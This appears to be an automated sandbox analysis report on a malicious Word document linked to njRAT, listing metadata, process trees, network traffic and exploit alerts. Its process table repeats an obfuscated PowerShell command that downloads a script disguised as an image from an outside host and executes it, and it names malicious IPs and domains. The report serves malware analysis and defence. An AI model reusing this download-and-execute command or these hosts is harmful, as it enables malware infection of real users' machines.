File name: | 11d39a7907f4559a3b2b8cae165637cd879ed23a9e019a59ce4c183e32463557.doc |
Full analysis: | https://app.any.run/tasks/bdfc6c55-1ee7-4ed9-a7e7-512b857a9ebf |
Verdict: | Malicious activity |
Threats: | njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world. |
Analysis date: | September 11, 2019, 01:48:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 887A41D358F46C03F6AA84F3FC6B7A2D |
SHA1: | F7A9F9E11178B34E5C8FFEF09615A9D96699D3C2 |
SHA256: | 11D39A7907F4559A3B2B8CAE165637CD879ED23A9E019A59CE4C183E32463557 |
SSDEEP: | 768:kw8YHz64ustaPvM7eB7G+aY/ML88wHd0nusQKIR:kwZHz6OoE7eB7G+pMBwHd7Ko |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
AppVersion: | 14 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 65 |
LinksUpToDate: | No |
Company: | Microsoft |
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 56 |
Words: | 10 |
Pages: | 1 |
TotalEditTime: | 1 minute |
Template: | Normal.dotm |
ModifyDate: | 2019:09:09 18:44:00Z |
CreateDate: | 2019:09:09 18:43:00Z |
RevisionNumber: | 3 |
LastModifiedBy: | Microsoft |
Keywords: | - |
Description: | - |
---|---|
Creator: | Microsoft |
Subject: | - |
Title: | - |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1526 |
ZipCompressedSize: | 407 |
ZipCRC: | 0x8b9521a1 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2864 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\11d39a7907f4559a3b2b8cae165637cd879ed23a9e019a59ce4c183e32463557.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3964 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3344 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 | ||||
2552 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://refugiovistaserrana.com.br/novosite2/cogumelo.jpg'',$env:APPDATA+''\''+''cogumeloxd.vbs'')'|D; start-process($env:APPDATA+'\'+'cogumeloxd.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | OUTLOOK.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2424 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3388 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://refugiovistaserrana.com.br/novosite2/cogumelo.jpg'',$env:APPDATA+''\''+''cogumeloxd.vbs'')'|D; start-process($env:APPDATA+'\'+'cogumeloxd.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3996 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3932 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://refugiovistaserrana.com.br/novosite2/cogumelo.jpg'',$env:APPDATA+''\''+''cogumeloxd.vbs'')'|D; start-process($env:APPDATA+'\'+'cogumeloxd.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | OUTLOOK.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2760 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3172 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\cogumeloxd.vbs" | C:\Windows\System32\WScript.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 1 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D02.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{419E9A89-3920-43DB-BE17-B5367C7D3B7E} | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{4D67DE93-402A-48CF-BEC7-D700ECEA156B} | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A3112D8.doc | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\948476A6.doc | — | |
MD5:— | SHA256:— | |||
3964 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRD94D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3344 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRDEEB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2424 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE6BB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2552 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M81Q2IXYNARRWHWDXU7X.temp | — | |
MD5:— | SHA256:— | |||
3996 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVREA84.tmp.cvr | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | HEAD | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | — | — | shared |
2864 | WINWORD.EXE | GET | 304 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | HEAD | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | — | — | shared |
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | — | — | malicious |
2864 | WINWORD.EXE | GET | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | text | 561 Kb | malicious |
2864 | WINWORD.EXE | GET | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | html | 117 b | shared |
2864 | WINWORD.EXE | HEAD | 200 | 172.105.68.75:80 | http://172.105.68.75/macro.doc | US | text | 561 Kb | malicious |
2864 | WINWORD.EXE | HEAD | 301 | 67.199.248.10:80 | http://bit.ly/2kqOzpz | US | — | — | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
984 | svchost.exe | 67.199.248.15:443 | bitly.com | Bitly Inc | US | shared |
984 | svchost.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
2864 | WINWORD.EXE | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
2552 | powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2864 | WINWORD.EXE | 172.105.68.75:80 | — | — | US | malicious |
3932 | powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
3552 | powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2984 | Powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2940 | Powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
2936 | Powershell.exe | 186.202.153.226:443 | refugiovistaserrana.com.br | Locaweb Serviços de Internet S/A | BR | unknown |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
bitly.com |
| shared |
refugiovistaserrana.com.br |
| unknown |
google.com |
| whitelisted |
duckoption.duckdns.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | A Network Trojan was detected | MALWARE [PTsecurity] RTF CVE-2017-11882 Exploit |
2864 | WINWORD.EXE | A Network Trojan was detected | MALWARE [PTsecurity] RTF CVE-2017-11882 Exploit |
2864 | WINWORD.EXE | A Network Trojan was detected | MALWARE [PTsecurity] RTF CVE-2017-11882 Exploit |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
2864 | WINWORD.EXE | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |